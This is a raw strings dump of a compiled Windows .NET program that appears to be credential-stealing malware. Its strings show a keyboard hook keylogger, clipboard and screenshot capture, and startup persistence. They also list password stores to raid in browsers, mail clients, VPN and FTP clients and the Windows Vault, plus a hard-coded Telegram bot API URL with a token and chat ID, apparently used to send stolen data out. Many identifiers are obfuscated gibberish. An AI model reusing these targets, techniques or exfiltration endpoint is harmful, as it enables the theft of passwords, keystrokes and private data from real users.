!This program cannot be run in DOS mode.
`.rsrc
@.reloc
com.apple.Safari
Unable to resolve HTTP prox
1SPS*
KDBM((
v4.0.30319
#Strings
% > H P V ` h
! 9 Y }
1P1:1-1
mLX8LWBOA0
3JyIsTeG0
YlOKi21J0
SHf0Q0
4MDHXXrKS0
OQ8HrObVc0
sawfov33dd0
psLde0
Tdgjrt0
0a49u0
$$method0x6000120-1
$$method0x6000191-1
$$method0x6000105-1
$$method0x6000115-1
$$method0x6000255-1
$$method0x600011a-1
$$method0x600008c-1
$$method0x600007d-1
$$method0x600011f-1
$$method0x600013f-1
$$method0x60000ff-1
35gsPoCO31
7f774f41-d19b-45d0-93bb-bcea6f138241
dvE0Iurf91
HMACSHA1
VT_UI1
0DPMaavXS1
okmq7ZuS1
o4bQW1
bKrAX1
IEnumerable`1
ICollection`1
IEnumerator`1
IList`1
NoNaMPa1
yEWqc1
CS$<>9__CachedAnonymousMethodDelegate1
get_Item1
$$method0x6000115-2
$$method0x6000255-2
$$method0x60000ff-2
HMACSHA512
Advapi32
kernel32
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
L62nrvDU92
giYqZF2
3J5H0bH2
VT_UI2
5Tkik5nWT2
KeyValuePair`2
Dictionary`2
2UbdAgX0h2
eUeNXtqtj2
LXEf1CjD5k2
tBfqDJkk2
get_Item2
MqVWYrt2
FXPRzbfuAw2
WWwuAiZ7Ez2
0iqwb6r53
4Yp7Eug63
oYiON3
R0eiZTP3
Tuple`3
aXzTh9Yxb3
376qXJRej3
get_Item3
CG5tw3
ToUInt64
ReadInt64
ToInt64
AX5QA94
ixnKzmdB4
5LoKCTZYKH4
VT_UI4
bURfnT4
s0zbVVKvXd4
Th2O0JdP3e4
i17hPkh4
sNwWRi4
OrKvf55
2K81zGA65
dEp9tq16sC5
zLg6wVgF5
JDXm8JviM5
y68udQIHkR5
4tir8E4b5
vrAWavBrc5
3Bvw7GSCrh5
nTHuC9O9j5
vuaN1zq6So5
4Q2bh6KD8t5
bjC0xULt5
IS_TEXT_UNICODE_ASCII16
IS_TEXT_UNICODE_REVERSE_ASCII16
ToUInt16
ReadInt16
ToInt16
HMACSHA256
4QvRK6
u2URRdjX6
7VaALNYg6
Frujj6
j21Cc37
7fU5B7
0xZUF7
HqsxSdH7
VaultGetItem_WIN7
sc1GAGO7
zsO6k7
GhnrmsiIt7
cRNzjBx7
QdEaQs798
FKgrC8
get_UTF8
VT_UI8
VaultGetItem_WIN8
koxMLDQ8
2M779yd8
6yXGj8
QST9lj8
BLOnlS9k8
5sWFR9
CQ1KzqwfV9
i9VKgnhm9
rYGuddUro9
LIQQ4gNv9
<Module>
F1Aw33A
vhAc4A
kkeaBA
d0YMdA
zNsY9B
DUxSWCB
BCRYPT_KEY_DATA_BLOB
VT_BLOB
cpjKUanB
JRBlWU6lBqB
E7DOvB
fvPNAhyec5C
llmYRJ7C
5CZxQfAC
T7hFFC
BCRYPT_KEY_DATA_BLOB_MAGIC
BJ8PL6pI0SC
zybR0CD
LLKHF_EXTENDED
LLKHF_INJECTED
3IVnz2FD
RZ9OfVqAHD
VT_CLSID
get_ID
set_ID
FileHandleID
fileHandleID
lpdwProcessID
processID
get_FormatID
set_FormatID
aHPZ4uNPD
gkfvuvlcXD
czhIzwdD
7L1pfjlD
DUPLICATE_CLOSE_SOURCE
BCRYPT_CHAINING_MODE
3nrebXxDE
VT_STORAGE
13mLJE
INVALID_HANDLE
VT_FILETIME
hJW4x2doPE
IS_TEXT_UNICODE_SIGNATURE
IS_TEXT_UNICODE_REVERSE_SIGNATURE
VT_DATE
IS_TEXT_UNICODE_DBCS_LEADBYTE
Gy26Q0K27pE
nRaW2frE
i1JOl0F
kg1lAF
dD32YUKF
PHLyLDJuKF
G0GbX6t7NF
sWa1PJdF
mgPwWlF
tIcbzFn4AzF
yy6rXdZG5G
tiq898G
Tj32oG9G
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
LArMAG
qGAlCcoVWQG
PYI4nQG
IicScPhBvUG
trRkisxPaG
t1zooG
6OCwoG
gLx7l8pvG
HOH9t3D20H
STATUS_AUTH_TAG_MISMATCH
STATUS_INFO_LENGTH_MISMATCH
a90pDVINEH
mdkej1JH
wmSxgkgNH
7nbaqS1KPH
Z8eZFTH
IS_TEXT_UNICODE_ODD_LENGTH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
lNrluMAYH
0QriE5wH
bJl3nxH
SsPL2auyzH
W7omEf6I
cKJH9I
GwlJ2rUzRAI
get_ASCII
aRtd3GIcCMI
EmUxMI
eNoGsy2xuI
Pp8vmfVUJ
blUncJ
MNJw1XQfJ
ugF2HigJ
g0d2X3iJ
3ilOLiJ
W0Hc7tlJ
Tot13wFenJ
eOsw1K
VWKT3K
GZ8TO8K
gnQIE6YCOK
zQdqROsGWQK
IS_TEXT_UNICODE_UNICODE_MASK
IS_TEXT_UNICODE_NOT_UNICODE_MASK
IS_TEXT_UNICODE_REVERSE_MASK
IS_TEXT_UNICODE_NOT_ASCII_MASK
teI93TyZK
KaLNahx7lrK
VT_DECIMAL
DaqUYHL
R8YIIL
VT_NULL
WH_KEYBOARD_LL
VT_BOOL
g1YyJziWL
7pdkTFmwfL
PoLQBDlL
pzUXASnelL
S361hZEBAtL
VT_VERSIONED_STREAM
VT_STREAM
BCRYPT_CHAIN_MODE_GCM
BCRYPT_AES_ALGORITHM
MOdHMM
DEWvyCuM
tdKAQFnc3N
rFWqySR9A8N
QWVVfqRjmFN
0eDVIMHSGN
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
HC_ACTION
LLKHF_ALTDOWN
WM_SYSKEYDOWN
WM_KEYDOWN
dqf8ArXN
b6IEYN
BvXumYN
d4ZoYN
lSajM2xymfN
dXZzcqN
Fe7m1DO
System.IO
zVZSwluwHKO
z8DalLO
lhDNJhOO
gaC4eO
aXysLQlvI4P
BCRYPT_PAD_OAEP
hvPvYD5KP
3nHCD6IQKP
IhFfSTgKP
0zrKLP
eDLx4pWgkLP
UYutCYDyxOP
dcU3oSP
WM_SYSKEYUP
WM_KEYUP
LLKHF_UP
BdjzQgEbP
Q6W9t6PQzdP
WSgHYxBTjP
Hrwo4mP
PdcQ9Mv02Q
4UB6Aeofx3Q
a14kxdtjH5Q
hR33WsQaM8Q
fo9WzEQ
tDMmsI6NIQ
CVLeJQ
MDZQipeOQ
eL35O2VQ
kSTBhQ
rAVGH9amQ
8VHExQ
1a5nS0K0R
80A47R
MS_PRIMITIVE_PROVIDER
VdJpkBLR
VT_ERROR
VT_VECTOR
VT_BSTR
VT_LPSTR
VT_LPWSTR
uj7AaaR
MGFK7U3ybR
PWmhVMZzwR
ITAMYxzR
Zg2eBS
IS_TEXT_UNICODE_STATISTICS
IS_TEXT_UNICODE_REVERSE_STATISTICS
5jsWMIES
IS_TEXT_UNICODE_NULL_BYTES
IS_TEXT_UNICODE_CONTROLS
IS_TEXT_UNICODE_REVERSE_CONTROLS
IS_TEXT_UNICODE_ILLEGAL_CHARS
7wqmwRS
DUPLICATE_SAME_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
BCRYPT_PAD_PSS
xyPcAMirlS
JJA1zS
9pMqT1T
Jc4g1T
IPV43ILHi2T
Iq2dPd5p8T
jgF8hC8BT
9UsLQ1zET
VT_UINT
VT_INT
QcERpZBQnRT
4D6YrM7qeT
BwP3iT
TOLbnT
MfoRrT
OCvYworT
KZpHTD8za7U
NPYymFEU
sNqEMU
5GWpa1NPU
cK0o2cDXU
69LDYU
k5GWIDMbyU
UtEpE14V
inzNv6M8V
2gPT2UMptCV
mirTLEak7EV
get_IV
set_IV
PaCgsSbV
K3JVyV
KDgOouNz1W
gYBWj0kAW
xSqBaHfTBW
STATUS_BUFFER_OVERFLOW
ZLNc5qQW
vLUqc16VW
0LMpSbW
luizWn1ccqW
JLXaEX
SWW6lTGg4IX
KkgnMX
3MG6RfChX
ThRfVsX
XTci4vX
VT_ARRAY
iBh7BY
AjjC5lL6wEY
Tzo8DchHY
VT_EMPTY
Oq47lY
3VZNQfZ6Z
fnxxOGZ
C1vMgZJZ
VhWiDEOZ
6FDSacrVOZ
HTDGffAN6UZ
Sjr1k4lZ
aSz4kZJqZ
value__
xaoby4Ea
get_Data
set_Data
cbData
ProtectedData
cbAuthData
pbAuthData
PropertyData
SetQuota
TaWNahy4b
fFbWwK0AhGb
UMCTF0VlIHb
PublicIpAddressGrab
mscorlib
YxZnZqtWqb
HlJSyCwb
bnaQZOKZwb
M8TgXQsbIzb
CHTz5E07c
NomEs5Hc
yADXQc
WFyKWc
qivpRplHZic
System.Collections.Generic
Microsoft.VisualBasic
KrjyuABlc
WndProc
HookProc
FromFileTimeUtc
4dhDZcPwc
HvX2Bd
N2jSWtYBd
ySzPG6XMHd
get_Id
SchemaId
schemaId
pszAlgId
HookId
eQP0lovmId
GetWindowThreadProcessId
processId
ChatId
SchemaElementId
I3QARd
PageExecuteRead
OpenRead
FileMapRead
VirtualMemoryRead
CreateThread
lpcbNeeded
DomainExtended
SHA1Managed
RijndaelManaged
add_Changed
remove_Changed
get_LastModified
set_LastModified
_lastModified
Interlocked
set_Enabled
get_IsEnabled
set_IsEnabled
_enabled
Undefined
lpOverlapped
samDesired
add_Elapsed
get_LastAccessed
set_LastAccessed
_lastAccessed
get_Reserved
reserved
System.Collections.Specialized
dO84ghd
TorPid
activeWindowPid
pPackageSid
row_id
get_IsInvalid
get_Guid
vaultGuid
PcHwid
<ID>k__BackingField
<FormatID>k__BackingField
<Data>k__BackingField
<LastModified>k__BackingField
<IsEnabled>k__BackingField
<LastAccessed>k__BackingField
<Password>k__BackingField
<password>k__BackingField
<PropertyStorage>k__BackingField
<Name>k__BackingField
<FileName>k__BackingField
<ApplicationName>k__BackingField
<Username>k__BackingField
<username>k__BackingField
<Type>k__BackingField
<type>k__BackingField
<TypedPropertyValue>k__BackingField
<Size>k__BackingField
<IsRunning>k__BackingField
<Path>k__BackingField
<hostmask>k__BackingField
<Version>k__BackingField
<Application>k__BackingField
<Description>k__BackingField
<user>k__BackingField
<hoster>k__BackingField
<Tasks>k__BackingField
<objects>k__BackingField
<Accounts>k__BackingField
<Keys>k__BackingField
<Lenght>k__BackingField
<Host>k__BackingField
<GuidMasterKey>k__BackingField
GetField
TrimEnd
ReadToEnd
AppEnd
Append
get_Millisecond
GetUpperBound
GetLowerBound
set_Method
method
Clipboard
get_Password
set_Password
DomainPassword
get_password
set_password
E9UPn7twDud
vN57tBOe
AJ3u4kxMOe
LgQSab2NVe
Xsxu8ofDbe
sO96kWwcbe
Replace
DeleteBackspace
QueryDosDevice
hInstance
IdentityReference
Sequence
cbNonce
pbNonce
Resource
vkCode
wScanCode
scanCode
keyCode
set_Mode
FileMode
ShareMode
PaddingMode
CryptoStreamMode
CipherMode
SelectSingleNode
XmlNode
get_Unicode
get_BigEndianUnicode
IsTextUnicode
le11hfe
FromImage
SectionImage
get_PropertyStorage
set_PropertyStorage
SerializedPropertyStorage
SendMessage
AddRange
CompareExchange
CredentialCache
SectionNoCache
EndInvoke
BeginInvoke
GetEnvironmentVariable
SetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
hSourceHandle
SafeHandle
GetModuleHandle
RuntimeTypeHandle
ReleaseHandle
CloseHandle
DuplicateHandle
CreateHandle
GetTypeFromHandle
hSourceProcessHandle
hTargetProcessHandle
lpTargetHandle
bInheritHandle
vaultHandle
activeWindowHandle
handle
Rectangle
ToSingle
CreateFile
hTemplateFile
DeleteFile
WriteFile
MoveFile
MapViewOfFile
UnmapViewOfFile
lastTitle
activeWindowTitle
lphModule
get_MainModule
ProcessModule
get_Name
set_Name
lpDeviceName
get_FileName
set_FileName
GetModuleFileName
lpExistingFileName
lpFileName
GetFileName
lpNewFileName
_fileName
get_ModuleName
lpModuleName
lpBaseName
baseName
lpValueName
StartupRegName
rootPathName
get_OSFullName
get_FullName
OperatingSystemName
get_ApplicationName
set_ApplicationName
StartupInstallationName
lpName
lpAppName
get_UserName
get_ComputerName
ThisComputerName
ProcessorName
get_ProcessName
processName
StartupEnvName
GetProcessesByName
lpKeyName
pszCredentialFriendlyName
StartupDirectoryName
GetDirectoryName
astable_name
item_name
Filename
filename
get_Username
set_Username
get_username
set_username
DateTime
GetLastAccessTime
dwTime
AppendLine
get_NewLine
Combine
LocalMachine
Escape
Unescape
DataProtectionScope
get_Type
set_Type
pszBlobType
GetFileType
MimeType
ValueType
LogType
SecurityProtocolType
GetType
set_ContentType
item_type
get_type
set_type
FileShare
Compare
System.Core
PtrToStructure
get_InvariantCulture
Capture
NameObjectCollectionBase
HttpWebResponse
GetResponse
Dispose
Reverse
X509Certificate
GenericCertificate
DomainCertificate
Create
KBDLLHookProcDelegate
MulticastDelegate
Terminate
PcState
GetKeyboardState
lpKeyState
GetKeyState
Delete
PageReadWrite
PageExecuteReadWrite
nNumberOfBytesToWrite
FileMapWrite
VirtualMemoryWrite
Remote
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
SecuritySafeCriticalAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
ReliabilityContractAttribute
ParamArrayAttribute
RuntimeCompatibilityAttribute
SuppressUnmanagedCodeSecurityAttribute
set_UseShellExecute
FileMapExecute
ReadByte
ToByte
get_Value
HandleValue
TryGetValue
get_TypedPropertyValue
set_TypedPropertyValue
GetPropertyValue
set_KeepAlive
Remove
SectionReserve
eBun168hye
get_Size
set_Size
dataSize
cbSize
get_StorageSize
lpFileSize
get_NameSize
volumeNameSize
nFileSystemNameSize
SQLDataTypeSize
get_StoreSize
get_ValueSize
get_HashSize
set_BlockSize
chunkSize
get_KeySize
Serialize
Deserialize
Initialize
Finalize
Synchronize
page_size
Resize
Tq8zfrq5f
gB3knJMf
SizeOf
get_ItemOf
LastIndexOf
8EyYbbUf
cchBuff
bSjTImwn4gf
RyoS4l1wXif
dvXZjf
5JGqolf
lastInputInf
G7im7sf
M6JkzIzf
WApjAg
oH693OIIGFg
TWvTHg
xQPmZzQg
GGSHKZ1Wg
BgHHWg
CgLpRalecZg
m731wZg
B91AXteKdeg
get_Jpeg
HmxDfNQrXig
System.Threading
get_Padding
set_Padding
UTF8Encoding
encoding
System.Drawing.Imaging
get_IsRunning
set_IsRunning
CreateFileMapping
FromBase64String
ToBase64String
EscapeDataString
UnescapeDataString
lpReturnedString
GetPrivateProfileString
ToString
GetString
OctetString
BitString
Substring
System.Drawing
DeQ5Ypg
get_Msg
JKnr8Y3h
ovx2V4h
XXpnoKzSh
dnL5ulvUqTh
G5tGfh
dwMaximumSizeHigh
dwFileOffsetHigh
STI1thh
aXBbx1bEXlh
gGrkNoh
IiTFZmKph
ComputeHash
get_Path
set_Path
SystemAppdataPath
get_ExecutablePath
AsmFilePath
AppStartupFullPath
GetTempPath
GetFolderPath
lpTargetPath
StartupDirectoryPath
get_Width
get_Length
MaximumLength
dwMinLength
SystemInformationLength
ObjectInformationLength
set_MaxJsonLength
ReturnLength
maximumComponentLength
GetWindowTextLength
dwMaxLength
EndsWith
StartsWith
aDrWYpth
EQFwzel9i
Ykzri6di
A3oWiQYNbki
PtrToStringUni
StringToHGlobalUni
rJHqQaLZoi
TelegramApi
twYgl0Zpi
vnS3F30j
zySvPCY2j7j
QUNRMbjZj
objrij
VyDBgXwj
JTSKrEk
ZlvRhFk
8IWYrLBfGk
N9ZVqSk
3V38CLTYk
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
callback
get_CapsLock
TransformFinalBlock
TransformBlock
idHook
_clipboardHook
_keyboardHook
get_hostmask
set_hostmask
VZBYihjxk
ZiN7CHrCAl
Cv7eGl
kLvAIl
AllocHGlobal
FreeHGlobal
Illegal
Marshal
Decimal
System.Security.Principal
set_Interval
ScreenInterval
KeyloggerInterval
Rijndael
cbLabel
pbLabel
System.ComponentModel
EnableTorPanel
3iiShAbil
Kernel32.dll
kernel32.dll
User32.dll
user32.dll
vaultcli.dll
psapi.dll
ntdll.dll
bcrypt.dll
System.Xml
set_SecurityProtocol
Control
Yxc6Uggsl
nOdVtl
DnmWzl
qc64A0m
001y0PabBm
TkerNm
rZqdR5Wm
c6cc6PW0hZm
FileStream
get_BaseStream
GetResponseStream
CryptoStream
GetRequestStream
MemoryStream
get_LParam
get_WParam
get_Param
lParam
wParam
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
HmacAlgorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
jCWoN9zEmm
Random
hzBAKFZvpm
ICryptoTransform
unlDmKmtm
Maximum
root_num
HqBgwhu84n
Kd5ulvaW2Cn
5YTnMn
sAZHA5lnBQn
A7JvpXnNcTn
WypQ61MYn
ToBoolean
IsLittleEndian
CopyFromScreen
get_PrimaryScreen
lpNumberOfBytesWritten
X509Chain
ChangeClipboardChain
Extension
get_OSVersion
get_Version
set_Version
dwInfoVersion
get_Application
set_Application
get_Location
ObjectDataInformation
SystemRegistryQuotaInformation
SystemBasicInformation
ObjectBasicInformation
QueryLimitedInformation
SystemPerformanceInformation
SystemProcessorPerformanceInformation
SystemLookasideInformation
SystemHandleInformation
ObjectNameInformation
GetVolumeInformation
ObjectTypeInformation
ObjectAllInformation
NtQuerySystemInformation
SystemExceptionInformation
SystemProcessInformation
ObjectInformation
SetInformation
SystemInterruptInformation
SystemTimeOfDayInformation
QueryInformation
VirtualMemoryOperation
pszImplementation
System.Globalization
System.Web.Script.Serialization
System.Reflection
PropertyDataCollection
NameValueCollection
MatchCollection
GroupCollection
KeysCollection
ManagementObjectCollection
KeyCollection
set_Position
CreationDisposition
SearchOption
Win32Exception
CryptographicException
ArgumentOutOfRangeException
ArgumentException
get_Description
set_Description
get_StatusDescription
_description
System.Runtime.ConstrainedExecution
StringComparison
01q3RaCzSpn
add_KeyDown
remove_KeyDown
get_CtrlKeyDown
get_ShiftKeyDown
get_AltKeyDown
Unknown
CompareTo
CopyTo
lastInPutNfo
dwExtraInfo
ImageCodecInfo
FieldInfo
FileInfo
CultureInfo
pPaddingInfo
FileSystemInfo
MemberInfo
ComputerInfo
get_StartInfo
ProcessStartInfo
GetLastInputInfo
DirectoryInfo
DYcKcJDjo
OQgb0DIipo
OuJ695XlAp
pPZnH4Np
add_KeyUp
remove_KeyUp
9Wst8Xp
dwNumberOfBytesToMap
Bitmap
qYrmdp
e6ecDXykjp
UOdzFjNh1lp
TimeStamp
LocalApp
oZxJup
AppAddStartup
HideFileStartup
EYCSy0Rzp
UScq8I4q
zcyqF9q
ulcWm4Dq
ZkTaEq
jZlK1PPq
TAQ7pHqwSq
3ed4P6Wq
pQTYdq
x9oKkq
yjoPkTsUimq
System.Linq
7gUMFwQhJ1r
rNrKAr
UnCZdCIr
qI4J1xNuNLr
AQ5qhCGwZr
ToChar
lpChar
DirectorySeparatorChar
ObjectTypeNumber
volumeSerialNumber
StreamReader
TextReader
BinaryReader
SHA1CryptoServiceProvider
MD5CryptoServiceProvider
RNGCryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
StringBuilder
SpecialFolder
sender
Encoder
volumeNameBuffer
fileSystemNameBuffer
buffer
ServicePointManager
Integer
EnableClipboardLogger
EnableScreenLogger
_screenLogger
_keyLogger
EnableKeylogger
ManagementObjectSearcher
ObjectIdentifier
SecurityIdentifier
ElapsedEventHandler
LogTimer
ToUpper
CurrentUser
get_user
set_user
EncoderParameter
Object_Pointer
BitConverter
get_hoster
set_hoster
BinaryFormatter
SetClipboardViewer
ToLower
dpQnCzer
JavaScriptSerializer
5kQDor
get_Major
get_Minor
GetLastWin32Error
GetLastError
Authenticator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
RandomNumberGenerator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
passwordVaultPtr
ReadIntPtr
gd9eatr
VG2SYyr
RMqf7s
zV2FRs
Graphics
System.Diagnostics
get_Bounds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
GetInstances
get_ChildNodes
Matches
EnableCookies
GetDirectories
master_table_entries
get_Properties
ExpandEnvironmentVariables
GetFiles
EnumProcessModules
NumberStyles
GetSubKeyNames
field_names
ReadAllLines
GetProcesses
System.Security.Cryptography.X509Certificates
FlagsAndAttributes
lpFileMappingAttributes
SecurityAttributes
FileBytes
Rfc2898DeriveBytes
ReadAllBytes
BufferBytes
GetBytes
db_bytes
get_Values
GetLogicalDrives
fileSystemFlags
dwFlags
ElapsedEventArgs
1jwN8Qsp0hs
get_Ticks
get_Tasks
set_Tasks
y04kgyWqPls
ICredentials
set_Credentials
get_DefaultCredentials
Equals
CreateParams
VaultEnumerateItems
System.Windows.Forms
Contains
System.Web.Extensions
System.Text.RegularExpressions
iterations
System.Collections
set_MaximumAutomaticRedirections
StringSplitOptions
RegexOptions
options
get_Groups
A8Gl9hBrs
get_Chars
GetImageEncoders
System.Timers
RuntimeHelpers
EncoderParameters
SslPolicyErrors
SystemInformationClass
ObjectInformationClass
ManagementClass
dwDesiredAccess
GrantedAccess
FileAccess
FileMapAllAccess
processAccess
get_Success
CreateProcess
hProcess
OpenProcess
GetCurrentProcess
lpBaseAddress
PublicIpAddress
get_objects
set_objects
VaultEnumerateVaults
pPropertyElements
set_Arguments
get_Accounts
set_Accounts
get_Exists
yrHJHuts
dV5ntPF7Uws
get_Keys
set_Keys
get_ModifierKeys
N0PqoFAzs
c8GWfTCt
lA3XTt
Concat
AppendFormat
ImageFormat
Subtract
VT_BLOB_Object
VT_STREAMED_Object
VT_STORED_Object
ManagementBaseObject
hFileMappingObject
hObject
ManagementObject
cbKeyObject
pbKeyObject
NtQueryObject
object
Collect
set_AllowAutoRedirect
flProtect
Unprotect
System.Net
P6FqQEo1Set
offset
SGZiFJ4gt
get_Height
get_Lenght
set_Lenght
op_Explicit
SectionCommit
WaitForExit
cbSalt
1PIjlt
VaultOpenVault
get_Default
lpDefault
pcbResult
IAsyncResult
phkResult
result
UnsignedInt
rqYaZdnt
set_UserAgent
PublicUserAgent
System.Management
pResourceElement
XmlElement
pAuthenticatorElement
pIdentityElement
dwIncrement
sql_statement
Environment
XmlDocument
get_Parent
GetParent
get_Current
content
get_Count
get_HandleCount
get_TickCount
vaultItemCount
set_IterationCount
dwPropertiesCount
vaultCount
BCryptDecrypt
BCryptEncrypt
TrimStart
AppStart
Convert
UnsignedShort
HttpWebRequest
XmlNodeList
ToList
MozillaBrowserList
ChromiumBrowserList
get_Host
set_Host
set_Timeout
GetKeyboardLayout
dwLayout
cbInput
pbInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
Dk6JJD0dYxt
MoveNext
System.Text
LastCopiedText
KeylogText
ReadAllText
AppendAllText
get_InnerText
GetText
GetWindowText
Log_text
cbMacContext
pbMacContext
xf0nkK1u
Sq5Z60os1u
z8kKBcsj2u
F4hhAD88u
kat4RWFjAu
THgqDu
cJhceWaFu
Fk7vfvDMlbu
1IDSqXju
WmJMIW82v
kVLgM3v
csWVAAv
e4ZC3cbUCv
j2eHv0peZOv
4FUVbmQv
ns4a1AAJ5kv
4rzmdrv
YmOMpGP5w
d4veP5w
CVJZwJEw
ur2JRw
7W48puiw
dwMaximumSizeLow
dwFileOffsetLow
get_Now
GetForegroundWindow
NativeWindow
set_CreateNoWindow
SjVOyw
4iiFjAzw
tQ2KeYm0Bx
PWUhdEx
ToUnicodeEx
GetModuleFileNameEx
RegQueryValueEx
GetFileSizeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
MaximumEx
RegOpenKeyEx
8jG5zb6Mx
tf6qpSx
iU8YEgKGyTx
hdDvSUx
rBnUqxnVx
ucchMax
BufferEndIndex
BlockIndex
BufferStartIndex
P0W9ODhx
AdlEI7nx
9z5aTupx
ikQgH6xx
yzcHpqI5y
jCT5sNB9V6y
ProtectedArray
ToByteArray
InitializeArray
ToArray
ToCharArray
Consistency
nyx5ey
get_Key
set_Key
OpenSubKey
subKey
RegCloseKey
get_GuidMasterKey
set_GuidMasterKey
_guidMasterKey
ContainsKey
wVirtKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
_wsftpkey
System.Security.Cryptography
GetExecutingAssembly
PageReadonly
Multiply
PageWriteCopy
BlockCopy
FileMapCopy
System.Runtime.Serialization.Formatters.Binary
AmountOfMemory
get_TotalPhysicalMemory
Directory
Registry
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
System.Net.Security
Identity
IsNullOrEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
er109rcvy
u7QSM5J7z
24hH969z
RE5Egz
yfZZdktgz
cv10wtkCsrz
gG3exsz
$75cc1ebe-2556-439a-8d7f-5853ab4997dd
WrapNonExceptionThrows
1.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
p p p!p"p#p$p%p&p'p(p)p*p+p,p-p.p/p0p1p2p3p4p5p6p7p8p9p:p;p<p=p>p?p@pApDpEpFpGpHpKpfy|y
k#n+n9
4 5 6!7"8#9$:%;&<'=(>)?*@+A,B-C0D4E5F6G7H8I9K:N;O=QATD]FcJuPvTwVxYy]z`
BACAIHJHQPVUWUXU\[cbedfdgdhdidjdml
image/jpeg
/log.tmp
text/html
yyyy-MM-dd HH:mm:ss
<br>RAM:
MM/dd/yyyy HH:mm:ss
<br>CPU:
<br>OSFullName:
IP Address:
<br>User Name:
<br>Computer Name:
Time:
User Name:
Recovered!
Time:
OSFullName:
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
https://api.telegram.org/bot6469500942:AAEMP24TLJoJ148waovnFcbAoYTqdsUYQ2E/
749030041
appdata
yNfeJW
yNfeJW.exe
]</b> (
{CAPSLOCK}
{BACK}
control
{PageDown}
{KEYDOWN}
{Insert}
{KEYRIGHT}
{KEYLEFT}
{ALT+TAB}
{KEYUP}
{ALT+F4}
{PageUp}
{NumLock}
{CTRL}
{HOME}
{ENTER}
"
<br><hr>Copied Text: <br>
logins
IE/Edge
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
UC Browser
UCBrowser\
Login Data
journal
wow_logins
Safari for Windows
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
<dict>
<string>
</string>
<data>
</data>
<array>
-convert xml1 -s -o "
\fixed_keychain.xml"
\Microsoft\Credentials\
\Microsoft\Protect\
credential
QQ Browser
\Default\EncryptedStorage
\EncryptedStorage
Profile
Tencent\QQBrowser\User Data
entries
category
Password
password_value
IncrediMail
SmtpPassword
PopPassword
Software\IncrediMail\Identities\
\Accounts_New
SmtpServer
EmailAddress
Eudora
Software\Qualcomm\Eudora\CommandLine\
current
Settings
SavePasswordText
ReturnAddress
Falkon Browser
startProfile=([A-z0-9\/\.\"]+)
profiles.ini
\browsedata.db
autofill
\falkon\profiles\
ClawsMail
\clawsrc
\Claws-mail
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
Flock Browser
APPDATA
\Flock\Browser\
signons3.txt
DynDns
username=
password=
https://account.dyn.com/
ALLUSERSPROFILE
Dyn\Updater\config.dyndns
t6KzXhCh
Dyn\Updater\daemon.cfg
global
accounts
account.
username
password
Psi/Psi+
\Psi\profiles
\Psi+\profiles
\accounts.xml
OpenVPN
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
auth-data
entropy
remote
USERPROFILE
\OpenVPN\config\
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
Private Internet Access
ProgramFiles(x86)
\Private Internet Access\data
\account.json
.*"username":"(.*?)"
.*"password":"(.*?)"
privateinternetaccess.com
%ProgramW6432%
Private Internet Access\data
FileZilla
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
CoreFTP
SOFTWARE\FTPWare\COREFTP\Sites
hdfzpysvpzimorhk
WinSCP
SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
PublicKeyFile
PortNumber
[PRIVATE KEY LOCATION: "{0}"]
ABCDEF
Flash FXP
Sites.dat
\FlashFXP\
quick.dat
yA36zA48dEhfrvghGRg57h5UlDv3
FTP Navigator
SystemDrive
\FTP Navigator\Ftplist.txt
Server
No Password
SmartFTP
